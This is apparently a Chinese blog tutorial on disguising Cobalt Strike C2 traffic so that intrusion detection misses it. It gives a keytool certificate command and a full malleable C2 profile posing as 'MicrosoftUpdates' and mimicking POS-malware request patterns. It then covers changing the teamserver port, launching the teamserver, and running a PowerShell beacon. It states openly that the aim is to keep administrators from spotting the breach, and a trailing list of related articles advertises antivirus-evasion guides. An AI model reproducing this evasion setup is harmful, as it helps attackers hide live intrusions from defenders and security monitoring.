零、为什么要对CS进行流量加密

cobalt strike 是很多红队的首选的攻击神器，在 APT 方面近几年应用范围很广，很多著名的团队都曾使用这个工具进行 APT，效果显著。导致很多 ids 入侵检测工具和流量检测工具已经可以拦截和发现，特别是流量方面，如果使用默认证书进行渗透和测试，特别在高度安全的环境下，好不容易找到一个突破口，因为证书没修改，被流量检测出来并进行拦截，检测报告将返回给管理员，管理员就能马上将缺口进行修复。那么红队之前的攻击就会付诸东流，攻击计划就要重新制定。

,

流量加密传输已经成为现在红队的基本素养，生成证书修改 C2 profile 加密混淆实际上就是对流量加密传输，目的逃逸流量安全审计，穿透检测器。

一、 生成免费的 ssl 证书

在运行 cobalt strike 默认使用的 cobaltstrike.store 证书，生成新证书的意义是将使用我们现在的制定好的证书。默认的证书 cobalt strike 会被检测。下面是生成证书的一些命令。

使用命令“ keytool -genkey -alias xbb -keyalg RSA -validity 36500 -keystore xbb.store “

注意：

Xbb与xbb.store这两个字符串都要记住 因为修改 profile 要使用。填写相关的地区信息 这些信息填写后在 profile 上还要使用 请勿乱填，填写了要保存。执行命令后提示输入密码，这个密码也要记住。如这里设置“ xbb1234 “，之后的信息一步一步的按照提示填写。

输入最后的“ y ”即可生成文件。

二、 创建并修改 C2-profile 文件

编译文件使用命令“ vim xbb.profile ”

内容为：

set sample_name "xbb POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
#设置证书
https-certificate {set CN "US";
set O "MicrosoftUpdates";
set C "en";
set L "US";
set OU "MicrosoftUpdates";
set ST "US";
set validity "365";
}
#设置
code-signer{set keystore "xbb.store";
set password "xbb1234";
set alias "alias";
}
#指定 DNS beacon 不用的时候指定到 IP 地址
set dns_idle "8.8.4.4";
#每个单独 DNS 请求前强制睡眠时间
set dns_sleep "0";
#通过 DNS 上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {netbios;
parameter "id";
}
output {base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
}
}
server {output {print;
}
}
}
http-get {set uri "/updates";
client {metadata {netbiosu;
prepend "user=";
header "Cookie";
}
}
server {header "Content-Type" "text/plain";
output {base64;
print;
}
}
}

注意设置这个两个地方：

三、 检测 C2 profile 文件是否可用

使用命令“ ./c2lint moonsec.profile ”。执行成功。

失败得是会出线红色。

四、 配置 teamserver 文件运行上线

teamserver 默认端口是 50050 ，先修改一下端口，防止很容易就检测出来。使用命令  “ vim teamserver ”， 修改为一个别的就好了

使用命令启动CS服务端“ nohup ./teamserver 192.168.0.102 123456 xbb.profile & ”。放在后台运行 避免 shell 关闭 teamserver 也关闭。

本地CS客户端连接，

新建监听器，

生成攻击payload，

在次之前，先去看看https的证书，已经生效 而且操作并不会被查杀。

查看具体信息，就是我们刚刚填写的那些信息。

复制powershell，注意这个64位要勾选，否则可能可以上线但是无法执行命令。

执行命令后，上线CS。

五、 抓取流量

在攻击者打开大鲨鱼，监听流量。

先随便执行一些命令。

流量通讯已经被加密，

网络安全进阶篇之流量加密（十三章-3）CS生成ssl证书修改c2 profile 加密流量逃逸检测相关推荐

1. 如何在 CentOS 7 上生成 SSL 证书为 Nginx 加密

   本文首发:开发指南:如何在 CentOS 7 上安装 Nginx Let's Encrypt 是由 Internet Security Research Group (ISRG) 开发的一个自由.自动 ...

2. 网络安全进阶篇之流量加密（十三章-2）MSF流量加密躲避检测

   文章目录 一.为什么要加密 二.创建证书 三.上线MSF 四.抓取流量测试 五.不上线的情况 5.1.经过测试win7系统无法上线. 5.2.看看配置是否正确 一.为什么要加密 为了防止主机被入侵,现 ...

3. 网络安全进阶篇（十一章-5）APP渗透测试篇（上）

   每日一句:渗透测试,一定要有耐心,所有的功能点都要测试.很多地方不亲身经历是没有太多的感受的. 一.App渗透测试原理 1.简介App渗透测试与Web渗透测试从某种角度说基本没有区别App其实就是手机 ...

4. 网络安全进阶篇之免杀（十四章-9）MSF加密壳免杀过360

   文章目录 一. 概念 1.1 360 安全卫士和 360 杀毒 二.前期准备 2.1 下载地址 三.具体过程 3.1 使用MSF生成木马并监听 3.2 免杀过程 3.3 测试 一. 概念 1.1 36 ...

5. 网络安全进阶篇（十一章-7）APP渗透测试篇（下）

   每日一句:重启可以解决很多问题,如虚拟机问题,模拟器问题等等,本文章的一些操作不成功的话,重启试试 一.快速自建一个App 1.App难写吗?(1) ~问:我不懂Java我能写App吗? 答:我觉得大 ...

6. 网络安全进阶篇（十一章-6）APP渗透测试篇（中）

   文章目录 零.前言 一.概述 二.修改模拟器hosts 三.信息收集 2.1 设置fiddler代理抓包 2.2 端口扫描 2.3 目录扫描 四.对目标进行渗透测试 4.1 找找有价值信息 4.2 本 ...

7. 网络安全进阶篇之免杀（十四章-7）C#加载器过360

   一. 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件.它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀 ...

8. 网络安全进阶篇之免杀（十四章-5） Golang加载器CS免杀国内主流杀软

   文章目录 一. 概念 1.1 360 安全卫士和 360 杀毒 1.2 Golang 二.前期准备 2.1 下载地址 三.具体过程 3.1 使用CS生成payload 3.2 免杀过程 3.3 测试 ...

9. UG/NX10二次开发学习视频目录整理（NXOPEN进阶篇）

   为了方便搜索需要的视频资料,整理了唐康林老师发布在B站的视频目录,支持全局目录搜索,点击直达视频. NX10二次开发(NXOPEN进阶篇) P1第01章-01-打算学习本门课程先看看这讲 P2第01章 ...

最新文章

1. 正则表达式Regular Expression
2. [APP] Android 开发笔记 001-环境搭建与命令行创建项目
3. 华为怎么升级Android11,华为EMUI 11/安卓11升级名单曝光 快来看看你的手机是否支持...
4. 2017.3.6~2017.3.7 Harry And Magic Box 思考记录（特别不容易）
5. Linux信号量以及互斥体
6. 一次局域网入侵全过程
7. 今天收到一封非常牛B的离职信
8. 性能测试指标TPS（Transaction per Second）总结
9. Mac版 微信 撤回消息拦截两种方法
10. 全球与中国智能灯市场深度研究分析报告
11. Scratch软件编程等级考试四级——20201219
12. c++实现的阻塞队列
13. clobber和glob
14. 语音群呼 售前营销售后服务一体化
15. flink Could not forward element to next operator
16. 基于jsp+mysql+ssm知了堂财务报账管理系统-计算机毕业设计
17. 知乎高赞：2021 年了，算法岗位应该怎样准备面试？
18. FaceMorphing
19. 2021年度国产地图软件盘点：这款高赞互联网地图红了整整一年
20. 解决不良贷款清收难 创新新对策

热门文章

1. 对比学习（一）-双塔模型-simCLR
2. ROS导航小车0 代价地图（仅作个人记录）
3. 900页文档比对只需5分钟？鸿翼InWise文档比对，以人工智能撬动办公效率杠杆
4. Ubuntu22下载安装
5. 如何在EditPlus、UltraEdit中正常显示韩文
6. 杭电研究生-应用数学-期末宝典(平时课堂答案)
7. 最长公共子串与最长公共子序列
8. 软件项目进度安排与跟踪：关键路径的计算
9. sql-索引的作用(超详细)
10. 关于软件常用的各种配置文件YAML、JSON、ini、XML比较